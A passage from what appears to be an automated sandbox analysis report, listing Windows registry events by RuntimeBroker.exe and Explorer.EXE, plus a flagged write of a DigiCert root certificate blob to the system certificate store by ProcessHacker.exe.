Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a4891ab6-1d8a-470d- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee00168f-5b6e-4573- = 285b0552178fdb01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ff454ce7-952c-4f6e- = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4db86a4a-a374-4b1e- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000093b6f651178fdb0193b6f651178fdb0193b6f651178fdb01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000675ab7212000346636323565386630346165393065613731643738343661666366306163636431653364653031633862353536326338616138386364626463616438306262300000b20009000400efbe675ab721675ab7212e000000000000000000000000000000000000000000000000006d820400340066003600320035006500380066003000340061006500390030006500610037003100640037003800340036006100660063006600300061006300630064003100650033006400650030003100630038006200350035003600320063003800610061003800380063006400620064006300610064003800300062006200300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005996153c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34663632356538663034616539306561373164373834366166636630616363643165336465303163386235353632633861613838636462646361643830626230000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006672617676646165000000000000000056e1d5537eadee4ea3bd7fca2c496cb6898f726d4dedef11b4047afb1048af0756e1d5537eadee4ea3bd7fca2c496cb6898f726d4dedef11b4047afb1048af07ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003800370034003000370032003700310038002d0032003200300035003400390032003800300033002d003100310038003900340031003900300037002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b75d2027000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee00168f-5b6e-4573- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dc69f590-051d-47a4- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8ab30b15-3419-480e- = "\\\\?\\Volume{27205DB7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6c77f17f5baf9135539a7484fd04292fa87aef9ed82f5a1e53001202b81e5d88" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee70691c-3ad8-4700- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee70691c-3ad8-4700- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dc69f590-051d-47a4- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2d2dd962-4ada-4da5- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8343759a-28de-4320- = f5282f53178fdb01 RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee00168f-5b6e-4573- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c59a337f-6614-4bb1- = "\\\\?\\Volume{27205DB7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\397a0555ca0064e5263dd83d845acbbb5f47ced363af47986dd3922bb83675e5" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2d2dd962-4ada-4da5- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee70691c-3ad8-4700- = 8a04f552178fdb01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8343759a-28de-4320- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee00168f-5b6e-4573- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4db86a4a-a374-4b1e- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c59a337f-6614-4bb1- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ff454ce7-952c-4f6e- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ff454ce7-952c-4f6e- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001ea14052178fdb01125fc152178fdb01125fc152178fdb0109690b000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000675ab8212000623236303966616563313765343436383231326264363337396466656665656235626138656330336562336131326663323566623639373762396239623737610000b20009000400efbe675ab821675ab8212e0000000000000000000000000000000000000000000000000016602701620032003600300039006600610065006300310037006500340034003600380032003100320062006400360033003700390064006600650066006500650062003500620061003800650063003000330065006200330061003100320066006300320035006600620036003900370037006200390062003900620037003700610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005996153c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c62323630396661656331376534343638323132626436333739646665666565623562613865633033656233613132666332356662363937376239623962373761000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006672617676646165000000000000000056e1d5537eadee4ea3bd7fca2c496cb6908f726d4dedef11b4047afb1048af0756e1d5537eadee4ea3bd7fca2c496cb6908f726d4dedef11b4047afb1048af07ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003800370034003000370032003700310038002d0032003200300035003400390032003800300033002d003100310038003900340031003900300037002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b75d2027000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee70691c-3ad8-4700- = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\27d3965e-09a3-4cd4- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\27d3965e-09a3-4cd4- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4db86a4a-a374-4b1e- = "\\\\?\\Volume{27205DB7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4f625e8f04ae90ea71d7846afcf0accd1e3de01c8b5562c8aa88cdbdcad80bb0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c59a337f-6614-4bb1- = e22ec152178fdb01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee70691c-3ad8-4700- = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8ab30b15-3419-480e- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a4891ab6-1d8a-470d- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ff454ce7-952c-4f6e- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ff454ce7-952c-4f6e- = "\\\\?\\Volume{27205DB7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\b2609faec17e4468212bd6379dfefeeb5ba8ec03eb3a12fc25fb6977b9b9b77a" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a4891ab6-1d8a-470d- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ff454ce7-952c-4f6e- = "0" RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a4891ab6-1d8a-470d- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dc69f590-051d-47a4- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d12d0c52178fdb01d12d0c52178fdb01d12d0c52178fdb01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000675ab8212000653633643762656362326564303263656430383731373731383030643762333734323961366532613332363637383137353135316439336335356565633836640000b20009000400efbe675ab821675ab8212e000000000000000000000000000000000000000000000000002f382001650036003300640037006200650063006200320065006400300032006300650064003000380037003100370037003100380030003000640037006200330037003400320039006100360065003200610033003200360036003700380031003700350031003500310064003900330063003500350065006500630038003600640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005996153c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65363364376265636232656430326365643038373137373138303064376233373432396136653261333236363738313735313531643933633535656563383664000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006672617676646165000000000000000056e1d5537eadee4ea3bd7fca2c496cb68c8f726d4dedef11b4047afb1048af0756e1d5537eadee4ea3bd7fca2c496cb68c8f726d4dedef11b4047afb1048af07ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003800370034003000370032003700310038002d0032003200300035003400390032003800300033002d003100310038003900340031003900300037002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b75d2027000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8343759a-28de-4320- RuntimeBroker.exe -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 ProcessHacker.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a ProcessHacker.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d